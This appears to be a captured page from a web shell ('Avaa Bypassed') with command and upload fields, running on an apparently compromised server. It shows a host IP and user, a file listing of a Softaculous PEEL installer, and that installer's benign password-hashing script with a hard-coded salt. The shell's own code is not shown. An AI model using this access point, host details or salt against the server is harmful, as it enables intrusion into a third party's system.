[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@18.227.140.251: ~ $ 
<?php

$resp = __get_user_password_hash('[[admin_pass]]');
echo '<update_pass>'.$resp.'</update_pass>';

function __get_user_password_hash($password, $tested_hash = null, $password_given_as_first_password_hash = false, $password_length_if_given_as_first_password_hash = null)
{
	if ($tested_hash == md5($password)) {
		return $tested_hash;
	}
	if (!$password_given_as_first_password_hash) {
		// Création d'un premier hash du mot de passe
		$first_password_hash = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'.$password);
		// set where salt will appear in hash
		$salt_start = strlen($password);
	} else {
		$first_password_hash = $password;
		$salt_start = $password_length_if_given_as_first_password_hash;
	}
	// if no salt given create random one
	if ($tested_hash == null) {
		$salt_hash = substr(hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'. uniqid(mt_rand(), true)), 0, 6);
	} else {
		$salt_hash = substr($tested_hash, 0, 6);
	}
	// add salt into text hash at pass length position and hash it
	if ($salt_start > 0 && $salt_start < strlen($salt_hash)) {
		$first_password_hash_start = substr($first_password_hash, 0, $salt_start);
		$first_password_hash_end = substr($first_password_hash, $salt_start, strlen($salt_hash));
		$hash_rough = hash('sha256' , 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]'. $first_password_hash_end . $salt_hash . $first_password_hash_start);
	} elseif ($salt_start > (strlen($salt_hash) - 1)) {
		$hash_rough = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]' . $first_password_hash . $salt_hash);
	} else {
		$hash_rough = hash('sha256', 'k)I8#;z=TIxnXmIPdW2TRzt4Ov89|#V~cU@]' . $salt_hash . $first_password_hash);
	}
	// put salt at front of hash
	$password_hash = $salt_hash . substr($hash_rough, 0, 26);
	if (empty($tested_hash) || $tested_hash == $password_hash) {
		return $password_hash;
	}
}

@unlink('update_pass.php');

?>

Filemanager

DIR : / var/ softaculous/ peel/
Name Type Size Permission Actions
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
clone.php File 5.58 KB 0644
edit.php File 4.98 KB 0644
edit.xml File 447 B 0644
fileindex.php File 512 B 0644
import.php File 3.09 KB 0644
info.xml File 4.57 KB 0644
install.js File 924 B 0644
install.php File 10.62 KB 0644
install.xml File 1.05 KB 0644
md5 File 4.69 KB 0644
notes.txt File 742 B 0644
update_pass.php File 1.84 KB 0644